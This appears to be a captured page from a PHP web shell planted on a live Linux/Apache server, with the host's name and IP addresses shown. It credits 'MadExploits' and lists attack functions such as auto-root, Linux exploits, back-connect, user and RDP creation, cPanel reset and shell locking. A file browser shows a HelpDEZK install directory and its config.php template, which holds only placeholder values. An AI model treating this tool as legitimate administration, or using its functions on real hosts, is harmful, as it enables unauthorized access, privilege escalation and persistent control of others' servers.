Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.142.172.250
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
helpdezk /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
changelog.txt
2.3
KB
-rw-r--r--
clone.php
5.62
KB
-rw-r--r--
config.php
1.79
KB
-rw-r--r--
edit.php
4.22
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
272
B
-rw-r--r--
import.php
3.68
KB
-rw-r--r--
info.xml
8.32
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
4.75
KB
-rw-r--r--
install.xml
904
B
-rw-r--r--
md5
2.28
KB
-rw-r--r--
notes.txt
354
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php date_default_timezone_set('America/New_York') ; //DATABASE CONFIGURATION $config["db_connect"] = "mysqli"; //mysqli = MYSQL | oci8po = Oracle $config["db_hostname"] = "[[softdbhost]]"; $config["db_port"] = "3306"; $config["db_name"] = "[[softdb]]"; $config["db_username"] = "[[softdbuser]]"; $config["db_password"] = "[[softdbpass]]"; //SYSTEM CONFIGURATION $config["hdk_url"] = "[[softurl]]"; $config["path_default"] = "[[relativeurl_]]"; $config["lang"] = "en_US"; $config["theme"] = "parracho"; $config["page_title"] = " [HELPDEZK] - Parracho - A free open source Helpdesk software! "; $config["jquery"] = "jquery-2.1.1.js"; //EXTERNAL STORAGE CONFIGURATION $config["external_storage"] = false ; $config["external_storage_path"] = 'puth_external_storage_path_here' ; $config["external_storage_url"] = 'puth_external_storage_url_here' ; //LOCATION CONFIGURATION if($config["lang"] == 'en_US') { $config["id_mask"] = "999-99-9999"; $config["ein_mask"] = "99-9999999"; $config["zip_mask"] = "00000"; $config["phone_mask"] = "(000) 000-0000"; $config["cellphone_mask"] = "(00) 00000-0000"; $config["date_placeholder"] = "mm/dd/yyyy"; $config["log_date_format"] = "%m/%d/%Y %H:%i:%s"; $config["date_format"] = "%m/%d/%Y"; $config["hour_format"] = "%h:%i %p"; } if($config["lang"] == 'pt_BR') { $config["id_mask"] = " ?999.999.999-99"; $config["ein_mask"] = " ?99.999.999/9999-99 "; $config["zip_mask"] = "00000-000"; $config["phone_mask"] = "(00) 0000-0000"; $config["cellphone_mask"] = "(00) 00000-0000"; $config["date_placeholder"] = "dd/mm/yyyy"; $config["log_date_format"] = "%d/%m/%Y %H:%i:%s"; $config["date_format"] = "%d/%m/%Y"; $config["hour_format"] = "%H:%i"; }
Close